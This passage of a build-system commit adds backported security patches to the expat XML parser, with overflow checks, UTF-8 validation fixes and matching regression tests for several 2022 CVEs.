+@@ -5056,6 +5061,16 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ }
+
+ if (dtd->scaffIndex) {
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (parser->m_groupSize > (size_t)(-1) / sizeof(int)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ int *const new_scaff_index = (int *)REALLOC(
+ parser, dtd->scaffIndex, parser->m_groupSize * sizeof(int));
+ if (new_scaff_index == NULL)
diff --git a/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch b/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
new file mode 100644
index 0000000000..e569fbc7ab
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-22822-27.patch
@@ -0,0 +1,257 @@
+From 9f93e8036e842329863bf20395b8fb8f73834d9e Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Thu, 30 Dec 2021 22:46:03 +0100
+Subject: [PATCH] lib: Prevent integer overflow at multiple places
+ (CVE-2022-22822 to CVE-2022-22827)
+
+The involved functions are:
+- addBinding (CVE-2022-22822)
+- build_model (CVE-2022-22823)
+- defineAttribute (CVE-2022-22824)
+- lookup (CVE-2022-22825)
+- nextScaffoldPart (CVE-2022-22826)
+- storeAtts (CVE-2022-22827)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/539/commits/9f93e8036e842329863bf20395b8fb8f73834d9e
+
+CVE: CVE-2022-22822 CVE-2022-22823 CVE-2022-22824 CVE-2022-22825 CVE-2022-22826 CVE-2022-22827
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 153 ++++++++++++++++++++++++++++++++++++++++++-
+ 1 file changed, 151 insertions(+), 2 deletions(-)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index 8f243126..575e73ee 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3261,13 +3261,38 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+
+ /* get the attributes from the tokenizer */
+ n = XmlGetAttributes(enc, attStr, parser->m_attsSize, parser->m_atts);
++
++ /* Detect and prevent integer overflow */
++ if (n > INT_MAX - nDefaultAtts) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ if (n + nDefaultAtts > parser->m_attsSize) {
+ int oldAttsSize = parser->m_attsSize;
+ ATTRIBUTE *temp;
+ #ifdef XML_ATTR_INFO
+ XML_AttrInfo *temp2;
+ #endif
++
++ /* Detect and prevent integer overflow */
++ if ((nDefaultAtts > INT_MAX - INIT_ATTS_SIZE)
++ || (n > INT_MAX - (nDefaultAtts + INIT_ATTS_SIZE))) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ parser->m_attsSize = n + nDefaultAtts + INIT_ATTS_SIZE;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(ATTRIBUTE)) {
++ parser->m_attsSize = oldAttsSize;
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ temp = (ATTRIBUTE *)REALLOC(parser, (void *)parser->m_atts,
+ parser->m_attsSize * sizeof(ATTRIBUTE));
+ if (temp == NULL) {
+@@ -3276,6 +3301,17 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ }
+ parser->m_atts = temp;
+ #ifdef XML_ATTR_INFO
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++# if UINT_MAX >= SIZE_MAX
++ if ((unsigned)parser->m_attsSize > (size_t)(-1) / sizeof(XML_AttrInfo)) {
++ parser->m_attsSize = oldAttsSize;
++ return XML_ERROR_NO_MEMORY;
++ }
++# endif
++
+ temp2 = (XML_AttrInfo *)REALLOC(parser, (void *)parser->m_attInfo,
+ parser->m_attsSize * sizeof(XML_AttrInfo));
+ if (temp2 == NULL) {
+@@ -3610,9 +3646,31 @@ storeAtts(XML_Parser parser, const ENCODING *enc, const char *attStr,
+ tagNamePtr->prefixLen = prefixLen;
+ for (i = 0; localPart[i++];)
+ ; /* i includes null terminator */
++
++ /* Detect and prevent integer overflow */
++ if (binding->uriLen > INT_MAX - prefixLen
++ || i > INT_MAX - (binding->uriLen + prefixLen)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
+ n = i + binding->uriLen + prefixLen;
+ if (n > binding->uriAlloc) {
+ TAG *p;
++
++ /* Detect and prevent integer overflow */
++ if (n > INT_MAX - EXPAND_SPARE) {
++ return XML_ERROR_NO_MEMORY;
++ }
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)(n + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ uri = (XML_Char *)MALLOC(parser, (n + EXPAND_SPARE) * sizeof(XML_Char));
+ if (! uri)
+ return XML_ERROR_NO_MEMORY;
+@@ -3708,6 +3766,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ if (parser->m_freeBindingList) {
+ b = parser->m_freeBindingList;
+ if (len > b->uriAlloc) {
++ /* Detect and prevent integer overflow */
++ if (len > INT_MAX - EXPAND_SPARE) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ XML_Char *temp = (XML_Char *)REALLOC(
+ parser, b->uri, sizeof(XML_Char) * (len + EXPAND_SPARE));
+ if (temp == NULL)
+@@ -3720,6 +3793,21 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ b = (BINDING *)MALLOC(parser, sizeof(BINDING));
+ if (! b)
+ return XML_ERROR_NO_MEMORY;
++
++ /* Detect and prevent integer overflow */
++ if (len > INT_MAX - EXPAND_SPARE) {
++ return XML_ERROR_NO_MEMORY;
++ }
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)(len + EXPAND_SPARE) > (size_t)(-1) / sizeof(XML_Char)) {
++ return XML_ERROR_NO_MEMORY;
++ }
++#endif
++
+ b->uri
+ = (XML_Char *)MALLOC(parser, sizeof(XML_Char) * (len + EXPAND_SPARE));
+ if (! b->uri) {
+@@ -6141,7 +6229,24 @@ defineAttribute(ELEMENT_TYPE *type, ATTRIBUTE_ID *attId, XML_Bool isCdata,
+ }
+ } else {
+ DEFAULT_ATTRIBUTE *temp;
++
++ /* Detect and prevent integer overflow */
++ if (type->allocDefaultAtts > INT_MAX / 2) {
++ return 0;
++ }
++
+ int count = type->allocDefaultAtts * 2;
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if ((unsigned)count > (size_t)(-1) / sizeof(DEFAULT_ATTRIBUTE)) {
++ return 0;
++ }
++#endif
++
+ temp = (DEFAULT_ATTRIBUTE *)REALLOC(parser, type->defaultAtts,
+ (count * sizeof(DEFAULT_ATTRIBUTE)));
+ if (temp == NULL)
+@@ -6792,8 +6897,20 @@ lookup(XML_Parser parser, HASH_TABLE *table, KEY name, size_t createSize) {
+ /* check for overflow (table is half full) */
+ if (table->used >> (table->power - 1)) {
+ unsigned char newPower = table->power + 1;
++
++ /* Detect and prevent invalid shift */
++ if (newPower >= sizeof(unsigned long) * 8 /* bits per byte */) {
++ return NULL;
++ }
++
+ size_t newSize = (size_t)1 << newPower;
+ unsigned long newMask = (unsigned long)newSize - 1;
++
++ /* Detect and prevent integer overflow */
++ if (newSize > (size_t)(-1) / sizeof(NAMED *)) {
++ return NULL;
++ }
++
+ size_t tsize = newSize * sizeof(NAMED *);
+ NAMED **newV = (NAMED **)table->mem->malloc_fcn(tsize);
+ if (! newV)
+@@ -7143,6 +7260,20 @@ nextScaffoldPart(XML_Parser parser) {
+ if (dtd->scaffCount >= dtd->scaffSize) {
+ CONTENT_SCAFFOLD *temp;
+ if (dtd->scaffold) {
++ /* Detect and prevent integer overflow */
++ if (dtd->scaffSize > UINT_MAX / 2u) {
++ return -1;
++ }
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (dtd->scaffSize > (size_t)(-1) / 2u / sizeof(CONTENT_SCAFFOLD)) {
++ return -1;
++ }
++#endif
++
+ temp = (CONTENT_SCAFFOLD *)REALLOC(
+ parser, dtd->scaffold, dtd->scaffSize * 2 * sizeof(CONTENT_SCAFFOLD));
+ if (temp == NULL)
+@@ -7212,8 +7343,26 @@ build_model(XML_Parser parser) {
+ XML_Content *ret;
+ XML_Content *cpos;
+ XML_Char *str;
+- int allocsize = (dtd->scaffCount * sizeof(XML_Content)
+- + (dtd->contentStringLen * sizeof(XML_Char)));
++
++ /* Detect and prevent integer overflow.
++ * The preprocessor guard addresses the "always false" warning
++ * from -Wtype-limits on platforms where
++ * sizeof(unsigned int) < sizeof(size_t), e.g. on x86_64. */
++#if UINT_MAX >= SIZE_MAX
++ if (dtd->scaffCount > (size_t)(-1) / sizeof(XML_Content)) {
++ return NULL;
++ }
++ if (dtd->contentStringLen > (size_t)(-1) / sizeof(XML_Char)) {
++ return NULL;
++ }
++#endif
++ if (dtd->scaffCount * sizeof(XML_Content)
++ > (size_t)(-1) - dtd->contentStringLen * sizeof(XML_Char)) {
++ return NULL;
++ }
++
++ const size_t allocsize = (dtd->scaffCount * sizeof(XML_Content)
++ + (dtd->contentStringLen * sizeof(XML_Char)));
+
+ ret = (XML_Content *)MALLOC(parser, allocsize);
+ if (! ret)
diff --git a/meta/recipes-core/expat/expat/CVE-2022-23852.patch b/meta/recipes-core/expat/expat/CVE-2022-23852.patch
new file mode 100644
index 0000000000..41425c108b
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-23852.patch
@@ -0,0 +1,33 @@
+From 847a645152f5ebc10ac63b74b604d0c1a79fae40 Mon Sep 17 00:00:00 2001
+From: Samanta Navarro <ferivoz@riseup.net>
+Date: Sat, 22 Jan 2022 17:48:00 +0100
+Subject: [PATCH] lib: Detect and prevent integer overflow in XML_GetBuffer
+ (CVE-2022-23852)
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/commit/847a645152f5ebc10ac63b74b604d0c1a79fae40
+
+CVE: CVE-2022-23852
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 5 +++++
+ 1 file changed, 5 insertions(+)
+
+diff --git a/expat/lib/xmlparse.c b/expat/lib/xmlparse.c
+index d54af683..5ce31402 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -2067,6 +2067,11 @@ XML_GetBuffer(XML_Parser parser, int len) {
+ keep = (int)EXPAT_SAFE_PTR_DIFF(parser->m_bufferPtr, parser->m_buffer);
+ if (keep > XML_CONTEXT_BYTES)
+ keep = XML_CONTEXT_BYTES;
++ /* Detect and prevent integer overflow */
++ if (keep > INT_MAX - neededSize) {
++ parser->m_errorCode = XML_ERROR_NO_MEMORY;
++ return NULL;
++ }
+ neededSize += keep;
+ #endif /* defined XML_CONTEXT_BYTES */
+ if (neededSize
diff --git a/meta/recipes-core/expat/expat/CVE-2022-23990.patch b/meta/recipes-core/expat/expat/CVE-2022-23990.patch
new file mode 100644
index 0000000000..c599517b3e
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-23990.patch
@@ -0,0 +1,49 @@
+From ede41d1e186ed2aba88a06e84cac839b770af3a1 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Wed, 26 Jan 2022 02:36:43 +0100
+Subject: [PATCH] lib: Prevent integer overflow in doProlog (CVE-2022-23990)
+
+The change from "int nameLen" to "size_t nameLen"
+addresses the overflow on "nameLen++" in code
+"for (; name[nameLen++];)" right above the second
+change in the patch.
+
+Upstream-Status: Backport:
+https://github.com/libexpat/libexpat/pull/551/commits/ede41d1e186ed2aba88a06e84cac839b770af3a1
+
+CVE: CVE-2022-23990
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ lib/xmlparse.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/lib/xmlparse.c b/expat/lib/xmlparse.c
+index 5ce31402..d1d17005 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -5372,7 +5372,7 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ if (dtd->in_eldecl) {
+ ELEMENT_TYPE *el;
+ const XML_Char *name;
+- int nameLen;
++ size_t nameLen;
+ const char *nxt
+ = (quant == XML_CQUANT_NONE ? next : next - enc->minBytesPerChar);
+ int myindex = nextScaffoldPart(parser);
+@@ -5388,7 +5388,13 @@ doProlog(XML_Parser parser, const ENCODING *enc, const char *s, const char *end,
+ nameLen = 0;
+ for (; name[nameLen++];)
+ ;
+- dtd->contentStringLen += nameLen;
++
++ /* Detect and prevent integer overflow */
++ if (nameLen > UINT_MAX - dtd->contentStringLen) {
++ return XML_ERROR_NO_MEMORY;
++ }
++
++ dtd->contentStringLen += (unsigned)nameLen;
+ if (parser->m_elementDeclHandler)
+ handleDefault = XML_FALSE;
+ }
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25235.patch b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
new file mode 100644
index 0000000000..be9182a5c1
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25235.patch
@@ -0,0 +1,283 @@
+From ee2a5b50e7d1940ba8745715b62ceb9efd3a96da Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 17:37:14 +0100
+Subject: [PATCH] lib: Drop unused macro UTF8_GET_NAMING
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/562/commits
+
+CVE: CVE-2022-25235
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmltok.c | 5 -----
+ 1 file changed, 5 deletions(-)
+
+diff --git a/lib/xmltok.c b/lib/xmltok.c
+index a72200e8..3bddf125 100644
+--- a/lib/xmltok.c
++++ b/lib/xmltok.c
+@@ -95,11 +95,6 @@
+ + ((((byte)[1]) & 3) << 1) + ((((byte)[2]) >> 5) & 1)] \
+ & (1u << (((byte)[2]) & 0x1F)))
+
+-#define UTF8_GET_NAMING(pages, p, n) \
+- ((n) == 2 \
+- ? UTF8_GET_NAMING2(pages, (const unsigned char *)(p)) \
+- : ((n) == 3 ? UTF8_GET_NAMING3(pages, (const unsigned char *)(p)) : 0))
+-
+ /* Detection of invalid UTF-8 sequences is based on Table 3.1B
+ of Unicode 3.2: http://www.unicode.org/unicode/reports/tr28/
+ with the additional restriction of not allowing the Unicode
+From 3f0a0cb644438d4d8e3294cd0b1245d0edb0c6c6 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 04:32:20 +0100
+Subject: [PATCH] lib: Add missing validation of encoding (CVE-2022-25235)
+
+---
+ expat/lib/xmltok_impl.c | 8 ++++++--
+ 1 file changed, 6 insertions(+), 2 deletions(-)
+
+diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
+index 0430591b4..64a3b2c15 100644
+--- a/lib/xmltok_impl.c
++++ b/lib/xmltok_impl.c
+@@ -61,7 +61,7 @@
+ case BT_LEAD##n: \
+ if (end - ptr < n) \
+ return XML_TOK_PARTIAL_CHAR; \
+- if (! IS_NAME_CHAR(enc, ptr, n)) { \
++ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NAME_CHAR(enc, ptr, n)) { \
+ *nextTokPtr = ptr; \
+ return XML_TOK_INVALID; \
+ } \
+@@ -90,7 +90,7 @@
+ case BT_LEAD##n: \
+ if (end - ptr < n) \
+ return XML_TOK_PARTIAL_CHAR; \
+- if (! IS_NMSTRT_CHAR(enc, ptr, n)) { \
++ if (IS_INVALID_CHAR(enc, ptr, n) || ! IS_NMSTRT_CHAR(enc, ptr, n)) { \
+ *nextTokPtr = ptr; \
+ return XML_TOK_INVALID; \
+ } \
+@@ -1134,6 +1134,10 @@ PREFIX(prologTok)(const ENCODING *enc, const char *ptr, const char *end,
+ case BT_LEAD##n: \
+ if (end - ptr < n) \
+ return XML_TOK_PARTIAL_CHAR; \
++ if (IS_INVALID_CHAR(enc, ptr, n)) { \
++ *nextTokPtr = ptr; \
++ return XML_TOK_INVALID; \
++ } \
+ if (IS_NMSTRT_CHAR(enc, ptr, n)) { \
+ ptr += n; \
+ tok = XML_TOK_NAME; \
+From c85a3025e7a1be086dc34e7559fbc543914d047f Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Wed, 9 Feb 2022 01:00:38 +0100
+Subject: [PATCH] lib: Add comments to BT_LEAD* cases where encoding has
+ already been validated
+
+---
+ expat/lib/xmltok_impl.c | 10 +++++-----
+ 1 file changed, 5 insertions(+), 5 deletions(-)
+
+diff --git a/lib/xmltok_impl.c b/lib/xmltok_impl.c
+index 64a3b2c1..84ff35f9 100644
+--- a/lib/xmltok_impl.c
++++ b/lib/xmltok_impl.c
+@@ -1266,7 +1266,7 @@ PREFIX(attributeValueTok)(const ENCODING *enc, const char *ptr, const char *end,
+ switch (BYTE_TYPE(enc, ptr)) {
+ # define LEAD_CASE(n) \
+ case BT_LEAD##n: \
+- ptr += n; \
++ ptr += n; /* NOTE: The encoding has already been validated. */ \
+ break;
+ LEAD_CASE(2)
+ LEAD_CASE(3)
+@@ -1335,7 +1335,7 @@ PREFIX(entityValueTok)(const ENCODING *enc, const char *ptr, const char *end,
+ switch (BYTE_TYPE(enc, ptr)) {
+ # define LEAD_CASE(n) \
+ case BT_LEAD##n: \
+- ptr += n; \
++ ptr += n; /* NOTE: The encoding has already been validated. */ \
+ break;
+ LEAD_CASE(2)
+ LEAD_CASE(3)
+@@ -1514,7 +1514,7 @@ PREFIX(getAtts)(const ENCODING *enc, const char *ptr, int attsMax,
+ state = inName; \
+ }
+ # define LEAD_CASE(n) \
+- case BT_LEAD##n: \
++ case BT_LEAD##n: /* NOTE: The encoding has already been validated. */ \
+ START_NAME ptr += (n - MINBPC(enc)); \
+ break;
+ LEAD_CASE(2)
+@@ -1726,7 +1726,7 @@ PREFIX(nameLength)(const ENCODING *enc, const char *ptr) {
+ switch (BYTE_TYPE(enc, ptr)) {
+ # define LEAD_CASE(n) \
+ case BT_LEAD##n: \
+- ptr += n; \
++ ptr += n; /* NOTE: The encoding has already been validated. */ \
+ break;
+ LEAD_CASE(2)
+ LEAD_CASE(3)
+@@ -1771,7 +1771,7 @@ PREFIX(updatePosition)(const ENCODING *enc, const char *ptr, const char *end,
+ switch (BYTE_TYPE(enc, ptr)) {
+ # define LEAD_CASE(n) \
+ case BT_LEAD##n: \
+- ptr += n; \
++ ptr += n; /* NOTE: The encoding has already been validated. */ \
+ break;
+ LEAD_CASE(2)
+ LEAD_CASE(3)
+From 6a5510bc6b7efe743356296724e0b38300f05379 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Tue, 8 Feb 2022 04:06:21 +0100
+Subject: [PATCH] tests: Cover missing validation of encoding (CVE-2022-25235)
+
+---
+ expat/tests/runtests.c | 109 +++++++++++++++++++++++++++++++++++++++++
+ 1 file changed, 109 insertions(+)
+
+diff --git a/tests/runtests.c b/tests/runtests.c
+index bc5344b1..9b155b82 100644
+--- a/tests/runtests.c
++++ b/tests/runtests.c
+@@ -5998,6 +5998,105 @@ START_TEST(test_utf8_in_cdata_section_2) {
+ }
+ END_TEST
+
++START_TEST(test_utf8_in_start_tags) {
++ struct test_case {
++ bool goodName;
++ bool goodNameStart;
++ const char *tagName;
++ };
++
++ // The idea with the tests below is this:
++ // We want to cover 1-, 2- and 3-byte sequences, 4-byte sequences
++ // go to isNever and are hence not a concern.
++ //
++ // We start with a character that is a valid name character
++ // (or even name-start character, see XML 1.0r4 spec) and then we flip
++ // single bits at places where (1) the result leaves the UTF-8 encoding space
++ // and (2) we stay in the same n-byte sequence family.
++ //
++ // The flipped bits are highlighted in angle brackets in comments,
++ // e.g. "[<1>011 1001]" means we had [0011 1001] but we now flipped
++ // the most significant bit to 1 to leave UTF-8 encoding space.
++ struct test_case cases[] = {
++ // 1-byte UTF-8: [0xxx xxxx]
++ {true, true, "\x3A"}, // [0011 1010] = ASCII colon ':'
++ {false, false, "\xBA"}, // [<1>011 1010]
++ {true, false, "\x39"}, // [0011 1001] = ASCII nine '9'
++ {false, false, "\xB9"}, // [<1>011 1001]
++
++ // 2-byte UTF-8: [110x xxxx] [10xx xxxx]
++ {true, true, "\xDB\xA5"}, // [1101 1011] [1010 0101] =
++ // Arabic small waw U+06E5
++ {false, false, "\x9B\xA5"}, // [1<0>01 1011] [1010 0101]
++ {false, false, "\xDB\x25"}, // [1101 1011] [<0>010 0101]
++ {false, false, "\xDB\xE5"}, // [1101 1011] [1<1>10 0101]
++ {true, false, "\xCC\x81"}, // [1100 1100] [1000 0001] =
++ // combining char U+0301
++ {false, false, "\x8C\x81"}, // [1<0>00 1100] [1000 0001]
++ {false, false, "\xCC\x01"}, // [1100 1100] [<0>000 0001]
++ {false, false, "\xCC\xC1"}, // [1100 1100] [1<1>00 0001]
++
++ // 3-byte UTF-8: [1110 xxxx] [10xx xxxx] [10xxxxxx]
++ {true, true, "\xE0\xA4\x85"}, // [1110 0000] [1010 0100] [1000 0101] =
++ // Devanagari Letter A U+0905
++ {false, false, "\xA0\xA4\x85"}, // [1<0>10 0000] [1010 0100] [1000 0101]
++ {false, false, "\xE0\x24\x85"}, // [1110 0000] [<0>010 0100] [1000 0101]
++ {false, false, "\xE0\xE4\x85"}, // [1110 0000] [1<1>10 0100] [1000 0101]
++ {false, false, "\xE0\xA4\x05"}, // [1110 0000] [1010 0100] [<0>000 0101]
++ {false, false, "\xE0\xA4\xC5"}, // [1110 0000] [1010 0100] [1<1>00 0101]
++ {true, false, "\xE0\xA4\x81"}, // [1110 0000] [1010 0100] [1000 0001] =
++ // combining char U+0901
++ {false, false, "\xA0\xA4\x81"}, // [1<0>10 0000] [1010 0100] [1000 0001]
++ {false, false, "\xE0\x24\x81"}, // [1110 0000] [<0>010 0100] [1000 0001]
++ {false, false, "\xE0\xE4\x81"}, // [1110 0000] [1<1>10 0100] [1000 0001]
++ {false, false, "\xE0\xA4\x01"}, // [1110 0000] [1010 0100] [<0>000 0001]
++ {false, false, "\xE0\xA4\xC1"}, // [1110 0000] [1010 0100] [1<1>00 0001]
++ };
++ const bool atNameStart[] = {true, false};
++
++ size_t i = 0;
++ char doc[1024];
++ size_t failCount = 0;
++
++ for (; i < sizeof(cases) / sizeof(cases[0]); i++) {
++ size_t j = 0;
++ for (; j < sizeof(atNameStart) / sizeof(atNameStart[0]); j++) {
++ const bool expectedSuccess
++ = atNameStart[j] ? cases[i].goodNameStart : cases[i].goodName;
++ sprintf(doc, "<%s%s><!--", atNameStart[j] ? "" : "a", cases[i].tagName);
++ XML_Parser parser = XML_ParserCreate(NULL);
++
++ const enum XML_Status status
++ = XML_Parse(parser, doc, (int)strlen(doc), /*isFinal=*/XML_FALSE);
++
++ bool success = true;
++ if ((status == XML_STATUS_OK) != expectedSuccess) {
++ success = false;
++ }
++ if ((status == XML_STATUS_ERROR)
++ && (XML_GetErrorCode(parser) != XML_ERROR_INVALID_TOKEN)) {
++ success = false;
++ }
++
++ if (! success) {
++ fprintf(
++ stderr,
++ "FAIL case %2u (%sat name start, %u-byte sequence, error code %d)\n",
++ (unsigned)i + 1u, atNameStart[j] ? " " : "not ",
++ (unsigned)strlen(cases[i].tagName), XML_GetErrorCode(parser));
++ failCount++;
++ }
++
++ XML_ParserFree(parser);
++ }
++ }
++
++ if (failCount > 0) {
++ fail("UTF-8 regression detected");
++ }
++}
++END_TEST
++
+ /* Test trailing spaces in elements are accepted */
+ static void XMLCALL
+ record_element_end_handler(void *userData, const XML_Char *name) {
+@@ -6175,6 +6274,14 @@ START_TEST(test_bad_doctype) {
+ }
+ END_TEST
+
++START_TEST(test_bad_doctype_utf8) {
++ const char *text = "<!DOCTYPE \xDB\x25"
++ "doc><doc/>"; // [1101 1011] [<0>010 0101]
++ expect_failure(text, XML_ERROR_INVALID_TOKEN,
++ "Invalid UTF-8 in DOCTYPE not faulted");
++}
++END_TEST
++
+ START_TEST(test_bad_doctype_utf16) {
+ const char text[] =
+ /* <!DOCTYPE doc [ \x06f2 ]><doc/>
+@@ -11870,6 +11977,7 @@ make_suite(void) {
+ tcase_add_test(tc_basic, test_ext_entity_utf8_non_bom);
+ tcase_add_test(tc_basic, test_utf8_in_cdata_section);
+ tcase_add_test(tc_basic, test_utf8_in_cdata_section_2);
++ tcase_add_test(tc_basic, test_utf8_in_start_tags);
+ tcase_add_test(tc_basic, test_trailing_spaces_in_elements);
+ tcase_add_test(tc_basic, test_utf16_attribute);
+ tcase_add_test(tc_basic, test_utf16_second_attr);
+@@ -11878,6 +11986,7 @@ make_suite(void) {
+ tcase_add_test(tc_basic, test_bad_attr_desc_keyword);
+ tcase_add_test(tc_basic, test_bad_attr_desc_keyword_utf16);
+ tcase_add_test(tc_basic, test_bad_doctype);
++ tcase_add_test(tc_basic, test_bad_doctype_utf8);
+ tcase_add_test(tc_basic, test_bad_doctype_utf16);
+ tcase_add_test(tc_basic, test_bad_doctype_plus);
+ tcase_add_test(tc_basic, test_bad_doctype_star);
diff --git a/meta/recipes-core/expat/expat/CVE-2022-25236.patch b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
new file mode 100644
index 0000000000..ba6443fc6a
--- /dev/null
+++ b/meta/recipes-core/expat/expat/CVE-2022-25236.patch
@@ -0,0 +1,129 @@
+From 6881a4fc8596307ab9ff2e85e605afa2e413ab71 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 00:19:13 +0100
+Subject: [PATCH] lib: Fix (harmless) use of uninitialized memory
+
+Upstream-Status: Backport
+https://github.com/libexpat/libexpat/pull/561/commits
+
+CVE: CVE-2022-25236
+
+Signed-off-by: Steve Sakoman <steve@sakoman.com>
+
+---
+ expat/lib/xmlparse.c | 6 ++----
+ 1 file changed, 2 insertions(+), 4 deletions(-)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index 902895d5..c768f856 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -718,8 +718,7 @@ XML_ParserCreate(const XML_Char *encodingName) {
+
+ XML_Parser XMLCALL
+ XML_ParserCreateNS(const XML_Char *encodingName, XML_Char nsSep) {
+- XML_Char tmp[2];
+- *tmp = nsSep;
++ XML_Char tmp[2] = {nsSep, 0};
+ return XML_ParserCreate_MM(encodingName, NULL, tmp);
+ }
+
+@@ -1344,8 +1343,7 @@ XML_ExternalEntityParserCreate(XML_Parser oldParser, const XML_Char *context,
+ would be otherwise.
+ */
+ if (parser->m_ns) {
+- XML_Char tmp[2];
+- *tmp = parser->m_namespaceSeparator;
++ XML_Char tmp[2] = {parser->m_namespaceSeparator, 0};
+ parser = parserCreate(encodingName, &parser->m_mem, tmp, newDtd);
+ } else {
+ parser = parserCreate(encodingName, &parser->m_mem, NULL, newDtd);
+From a2fe525e660badd64b6c557c2b1ec26ddc07f6e4 Mon Sep 17 00:00:00 2001
+From: Sebastian Pipping <sebastian@pipping.org>
+Date: Sat, 12 Feb 2022 01:09:29 +0100
+Subject: [PATCH] lib: Protect against malicious namespace declarations
+ (CVE-2022-25236)
+
+---
+ expat/lib/xmlparse.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/lib/xmlparse.c b/lib/xmlparse.c
+index c768f856..a3aef88c 100644
+--- a/lib/xmlparse.c
++++ b/lib/xmlparse.c
+@@ -3754,6 +3754,17 @@ addBinding(XML_Parser parser, PREFIX *prefix, const ATTRIBUTE_ID *attId,
+ if (! mustBeXML && isXMLNS
+ && (len > xmlnsLen || uri[len] != xmlnsNamespace[len]))
+ isXMLNS = XML_FALSE;
++
++ // NOTE: While Expat does not validate namespace URIs against RFC 3986,
++ // we have to at least make sure that the XML processor on top of
++ // Expat (that is splitting tag names by namespace separator into
++ // 2- or 3-tuples (uri-local or uri-local-prefix)) cannot be confused
